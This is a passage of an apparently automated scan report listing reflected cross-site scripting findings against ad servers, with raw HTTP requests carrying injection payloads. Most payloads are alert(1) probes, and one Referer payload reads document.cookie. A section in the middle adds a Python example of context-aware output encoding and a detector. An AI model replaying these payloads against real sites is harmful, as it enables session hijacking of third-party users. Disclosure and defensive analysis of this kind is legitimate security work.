This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=624!?che=3157054&clk1=a0834"%3balert(1)//2eb8545037b HTTP/1.1
Host: ad.aggregateknowledge.com
Proxy-Connection: keep-alive
Referer: http://www.kirtsy.com/login.php?return=/submit.php?fc309%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Ef2948ed7988=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=933114531302223782; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Fri, 15-Apr-2016 14:22:04 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BAJaoN4AAAAAAAEAhgEAmQECgwEQAAEAhn4dJA%2F%2FFdHHhAAAAAAAAAHTAAAAAAAAAoMAAAAAAAAAmQAdAAA%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Tue, 16-Apr-2013 14:22:04 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:22:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href=\"a0834";alert(1)//2eb8545037bhttp://ad.aggregateknowledge.com/interaction!che=1154063332?imid=2099820914518640516&ipid=467&caid=134&cgid=153&crid=643&a=CLICK&adid=29&status=0&l=http://www.pantene.com/en-US/news-and-offers/Pages/sa
...[SNIP]...

4.3. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dff2d"-alert(1)-"c09d0074cf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cf HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6978
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 17 Apr 2011 15:01:46 GMT
Expires: Sun, 17 Apr 2011 15:01:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
QozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=dff2d"-alert(1)-"c09d0074cfhttp://turbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...
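
Findings 4.1 to 4.3 (and the remaining DoubleClick instances that follow) are three variants of one mistake: the reflected value is written into a context whose delimiters it can close. In 4.1 the sink is a double-quoted HTML attribute, so `">` ends the attribute and the tag. In 4.2 the sink is a JavaScript string that itself carries HTML markup; the template escapes its own quotes as `\"` but not the parameter, so a bare `"` in clk1 ends the literal. In 4.3 the sink is the string passed to `escape("...")`, where `dff2d"-alert(1)-"c09d0074cf` closes the literal, runs `alert(1)` as the middle term of a subtraction, and reopens a string, leaving the script syntactically valid. The added example below, constructed for this page and not taken from either ad server's code, models each template, shows the context-specific encoder that closes the hole, and includes a small scanner that answers the question the probe answers: did the canary land inside a string literal or in code? The `document.write()` wrapper used for the 4.2 shape is an assumption.

```python
"""Context-aware output encoding for the sinks in 4.1 to 4.3: a double-quoted
HTML attribute, a double-quoted JS string carrying HTML, and a double-quoted JS
string inside escape("...").  Constructed example modelled on the captured
responses; the templates are not the ad servers' own code."""

import html
import json

AK_CLICK = "http://ad.aggregateknowledge.com/interaction"
DC_CLICK = "http://googleads.g.doubleclick.net/aclk?adurl="


def html_attr(value: str) -> str:
    """For text placed between double quotes in an HTML attribute."""
    return html.escape(value, quote=True)


def js_string(value: str) -> str:
    """A JS string literal, quotes included, that is safe inside a <script>
    block.  json.dumps escapes backslash and double quote (and, with the
    default ensure_ascii, U+2028/U+2029); <, > and & are escaped on top so the
    literal can never spell </script> or an HTML comment delimiter."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


# 4.1: HTML attribute context.
def anchor_vulnerable(clk1: str) -> str:
    return f'<a href="{clk1}{AK_CLICK}">'


def anchor_fixed(clk1: str) -> str:
    return f'<a href="{html_attr(clk1)}{AK_CLICK}">'


# 4.2: HTML inside a JS string.  The template escapes its own quotes (\")
# but not the parameter, which is what the capture shows.
def markup_in_js_vulnerable(clk1: str) -> str:
    return 'document.write("<a href=\\"' + clk1 + AK_CLICK + '\\">");'


def markup_in_js_fixed(clk1: str) -> str:
    # Nested contexts need nested encoders: HTML attribute first, JS string last.
    return "document.write(" + js_string(f'<a href="{html_attr(clk1)}{AK_CLICK}">') + ");"


# 4.3 (and 4.4 to 4.8): plain JS string context.
def click_url_vulnerable(adurl: str) -> str:
    return f'var url = escape("{DC_CLICK}{adurl}");'


def click_url_fixed(adurl: str) -> str:
    return f"var url = escape({js_string(DC_CLICK + adurl)});"


def in_string_literal(js: str, needle: str) -> bool:
    """Does `needle` sit inside a quoted JS string, or has it escaped into
    code?  Tracks single and double quotes with backslash escapes; enough for
    generated one-liners like the ones above (no comments, regex literals or
    template literals)."""
    stop = js.index(needle)
    quote = None
    i = 0
    while i < stop:
        c = js[i]
        if quote:
            if c == "\\":
                i += 1            # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
        i += 1
    return quote is not None


if __name__ == "__main__":
    probe = 'dff2d"-alert(1)-"c09d0074cf'      # payload from 4.3
    print(click_url_vulnerable(probe))
    print(in_string_literal(click_url_vulnerable(probe), "alert(1)"))   # False
    print(in_string_literal(click_url_fixed(probe), "alert(1)"))        # True
```

The encoder must match the innermost context and be applied in the right order: HTML-escaping alone would not have saved 4.2 or 4.3, because `&quot;` is not a JavaScript escape, and JavaScript-escaping alone would not have saved 4.1, because `\"` is a perfectly good way to end an HTML attribute.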

4.4. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd9ac"-alert(1)-"804dc1ac7d6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQcd9ac"-alert(1)-"804dc1ac7d6&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89c50"-alert(1)-"67bab8d9fab was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-158317497655140589c50"-alert(1)-"67bab8d9fab&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2f0"-alert(1)-"b664736df25 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1ff2f0"-alert(1)-"b664736df25&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59253"-alert(1)-"0ba314982cd was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
I8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ59253"-alert(1)-"0ba314982cd&client=ca-pub-1583174976551405&adurl=http%3a%2f%2fturbotax.intuit.com/affiliate/bbtretdm");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallows
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28074"-alert(1)-"e33ce0f8330 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.2;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIYwAIFyAKUlpIZqAMB6AORBOgDlgn1AwACkEQ&num=1&sig=AGiWqtxmv1nB6aysugVlvVUh-ppva-IbiQ&client=ca-pub-1583174976551405&adurl=;ord=552835799? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1583174976551405&output=html&h=250&slotname=8101847403&w=300&ea=0&flash=10.2.154&url=http%3A%2F%2Fwww.arto.com%2Fsection%2Flinkshare%2F&dt=1303052439349&bpp=2&shv=r20110406&jsv=r20110412&correlator=1303052439353&frm=1&adk=593971540&ga_vid=1742950866.1303052439&ga_sid=1303052439&ga_hid=1800218750&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2443789947&eid=33895132&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 17 Apr 2011 15:01:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7000

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aec/f/187/%2a/p%3B239614135%3B0-0%3B0%3B62445283%3B4307-300/250%3B41553595/41571382/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l28074"-alert(1)-"e33ce0f8330&ai=BWaHNlgCrTaXZB8WGlgfM8vT7DpSP2_wBhM7B_CX0n4eicQAQARgBIOLUlQs4AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wOyAQx3d3cuYXJ0by5jb226AQozMDB4MjUwX2FzyAEJ2gEmaHR0cDovL3d3dy5hcnRvLmNvbS9zZWN0aW9uL2xpbmtzaGFyZS-YAogYuAIY
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N5506.3159.GOOGLE/B5414667.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.3159.GOOGLE/B5414667.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44f9b"-alert(1)-"e081a0b507f was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.3159.GOOGLE/B5414667.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBA4fyLepTdTNGtud6Abe4J2CDtT-5fsBlMzB_CX0n4eicQAQARgBIL7O5Q04AFDD-vuwBmDJ7oOI8KPsEqABnLGo1wO6AQk3Mjh4OTBfYXPIAQnaAWBmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3hzcy1kb3JrLWxhd3llcnMtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWyYApYGuAIYwAIFyAKUlpIZqAMB6APdBegDyQfoA7oC9QMCAADE&num=1&sig=AGiWqtwRAWa76RcukwEkQc-2T3--rwlfxw&client=ca-pub-4063878933780912&adurl=44f9b"-alert(1)-"e081a0b507f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1302986276&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fxss-dork-lawyers-cross-site-scripting-poc-example-report.html&dt=1302968274562&bpp=5&shv=r20110406&jsv=r20110412&correlator=1302968276072&frm=0&adk=1607234649&ga_vid=217450935.1302968278&ga_sid=1302968278&ga_hid=1316019502&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1000&eid=36815001&fu=0&ifi=1&dtd=6355&xpc=7QG1qV76FG&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
